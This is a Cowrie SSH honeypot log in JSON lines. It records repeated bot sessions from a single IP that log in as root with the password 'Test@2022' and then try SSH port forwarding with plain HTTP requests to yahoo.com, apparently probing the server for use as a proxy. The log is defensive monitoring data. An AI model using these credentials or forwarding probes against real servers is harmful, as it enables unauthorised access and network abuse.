{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:19.958039Z","src_ip":"213.209.150.239","session":"ef40e18e7c44"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":14052,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14052","sensor":"my-vps","timestamp":"2025-08-26T00:58:20.110938Z","session":"ef40e18e7c44"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:20.167400Z","src_ip":"213.209.150.239","session":"ef40e18e7c44"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:20.224992Z","src_ip":"213.209.150.239","session":"ef40e18e7c44"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63794,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ac4f93b351c","protocol":"ssh","message":"New connection: 213.209.150.239:63794 (1.2.3.4:22) [session: 3ac4f93b351c]","sensor":"my-vps","timestamp":"2025-08-26T00:58:20.280449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:20.281117Z","src_ip":"213.209.150.239","session":"3ac4f93b351c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:20.337710Z","src_ip":"213.209.150.239","session":"3ac4f93b351c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:20.620155Z","src_ip":"213.209.150.239","session":"3ac4f93b351c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":26228,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:26228","sensor":"my-vps","timestamp":"2025-08-26T00:58:20.677568Z","session":"3ac4f93b351c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:20.734384Z","src_ip":"213.209.150.239","session":"3ac4f93b351c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":16492,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:16492","sensor":"my-vps","timestamp":"2025-08-26T00:58:20.890885Z","session":"3ac4f93b351c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:20.947455Z","src_ip":"213.209.150.239","session":"3ac4f93b351c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.005080Z","src_ip":"213.209.150.239","session":"3ac4f93b351c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63842,"dst_ip":"1.2.3.4","dst_port":22,"session":"58fe385c89d8","protocol":"ssh","message":"New connection: 213.209.150.239:63842 (1.2.3.4:22) [session: 58fe385c89d8]","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.060864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.061707Z","src_ip":"213.209.150.239","session":"58fe385c89d8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.118459Z","src_ip":"213.209.150.239","session":"58fe385c89d8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.401191Z","src_ip":"213.209.150.239","session":"58fe385c89d8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":10194,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:10194","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.458957Z","session":"58fe385c89d8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.515887Z","src_ip":"213.209.150.239","session":"58fe385c89d8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":6635,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6635","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.671178Z","session":"58fe385c89d8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.727865Z","src_ip":"213.209.150.239","session":"58fe385c89d8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.786366Z","src_ip":"213.209.150.239","session":"58fe385c89d8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63887,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8d57ddc4353","protocol":"ssh","message":"New connection: 213.209.150.239:63887 (1.2.3.4:22) [session: a8d57ddc4353]","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.841797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.842753Z","src_ip":"213.209.150.239","session":"a8d57ddc4353"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:21.899291Z","src_ip":"213.209.150.239","session":"a8d57ddc4353"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:22.181268Z","src_ip":"213.209.150.239","session":"a8d57ddc4353"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":12502,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:12502","sensor":"my-vps","timestamp":"2025-08-26T00:58:22.238532Z","session":"a8d57ddc4353"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:22.295207Z","src_ip":"213.209.150.239","session":"a8d57ddc4353"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":16384,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:16384","sensor":"my-vps","timestamp":"2025-08-26T00:58:22.450960Z","session":"a8d57ddc4353"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:22.507619Z","src_ip":"213.209.150.239","session":"a8d57ddc4353"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:22.565209Z","src_ip":"213.209.150.239","session":"a8d57ddc4353"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63939,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca44a48c9035","protocol":"ssh","message":"New connection: 213.209.150.239:63939 (1.2.3.4:22) [session: ca44a48c9035]","sensor":"my-vps","timestamp":"2025-08-26T00:58:22.620878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:22.621518Z","src_ip":"213.209.150.239","session":"ca44a48c9035"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:22.678304Z","src_ip":"213.209.150.239","session":"ca44a48c9035"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:22.960432Z","src_ip":"213.209.150.239","session":"ca44a48c9035"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":317,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:317","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.019090Z","session":"ca44a48c9035"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.075804Z","src_ip":"213.209.150.239","session":"ca44a48c9035"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":16254,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16254","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.230992Z","session":"ca44a48c9035"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.287655Z","src_ip":"213.209.150.239","session":"ca44a48c9035"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.345091Z","src_ip":"213.209.150.239","session":"ca44a48c9035"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63977,"dst_ip":"1.2.3.4","dst_port":22,"session":"0aba192d34d5","protocol":"ssh","message":"New connection: 213.209.150.239:63977 (1.2.3.4:22) [session: 0aba192d34d5]","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.391522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.392474Z","src_ip":"213.209.150.239","session":"0aba192d34d5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.439919Z","src_ip":"213.209.150.239","session":"0aba192d34d5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.675002Z","src_ip":"213.209.150.239","session":"0aba192d34d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":5258,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:5258","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.723670Z","session":"0aba192d34d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.771016Z","src_ip":"213.209.150.239","session":"0aba192d34d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14621,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14621","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.905619Z","session":"0aba192d34d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:23.952817Z","src_ip":"213.209.150.239","session":"0aba192d34d5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.000668Z","src_ip":"213.209.150.239","session":"0aba192d34d5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64023,"dst_ip":"1.2.3.4","dst_port":22,"session":"196ddf79f334","protocol":"ssh","message":"New connection: 213.209.150.239:64023 (1.2.3.4:22) [session: 196ddf79f334]","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.046718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.047904Z","src_ip":"213.209.150.239","session":"196ddf79f334"}
